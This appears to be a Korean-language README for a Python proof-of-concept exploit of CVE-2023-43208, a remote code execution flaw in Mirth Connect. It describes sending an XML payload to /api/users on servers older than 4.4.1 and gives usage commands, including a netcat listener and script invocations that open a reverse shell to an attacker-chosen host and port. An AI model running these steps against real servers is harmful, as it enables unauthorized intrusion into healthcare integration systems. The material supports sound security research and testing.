
PoC for CVE-2023-43208 RCE exploitation. CVE-2023-43208 RCE 익스플로잇을 위한 PoC.
Mirth Connect의 CVE-2023-43208을 대상으로 하는 개념 증명(PoC) Python 스크립트입니다.
소유하고 있거나 명시적으로 테스트할 권한이 있는 환경에서만 사용하세요. 이 저장소는 보안 연구, 검증, 방어적 테스트를 위한 것입니다. 저자는 이 도구로 인한 오용 또는 피해에 대해 책임을 지지 않습니다.
exp.py는 PoC의 최소 의존성 버전으로, 다음과 같은 기능을 수행합니다:
/api/server/version에서 Mirth Connect 버전을 요청합니다.4.4.1보다 낮은지 확인합니다./api/users로 XML 페이로드를 전송합니다.스크립트는 기본적으로 HTTPS를 사용하며, --http 옵션으로 HTTP로 전환할 수 있습니다.
python3 exp.py -u <target> -lh <listener_host> -lp <listener_port> [--http]
-u, --url: 대상 Mirth Connect URL 또는 호스트-lh, --lhost: 리버스 연결을 위한 로컬 호스트/IP-lp, --lport: 로컬 리스닝 포트--http: HTTPS 대신 HTTP를 강제로 사용 (기본값은 HTTPS)먼저 리스너를 시작합니다:
nc -lvnp 4444
스크립트를 실행합니다:
python3 exp.py -u https://target.example.com -lh 192.168.1.10 -lp 4444
HTTP 전용 대상인 경우:
python3 exp.py -u target.example.com -lh 192.168.1.10 -lp 4444 --http
4.4.1과의 시맨틱 비교를 기반으로 합니다.K3ysTr0K3R 및 Chocapikkpredyy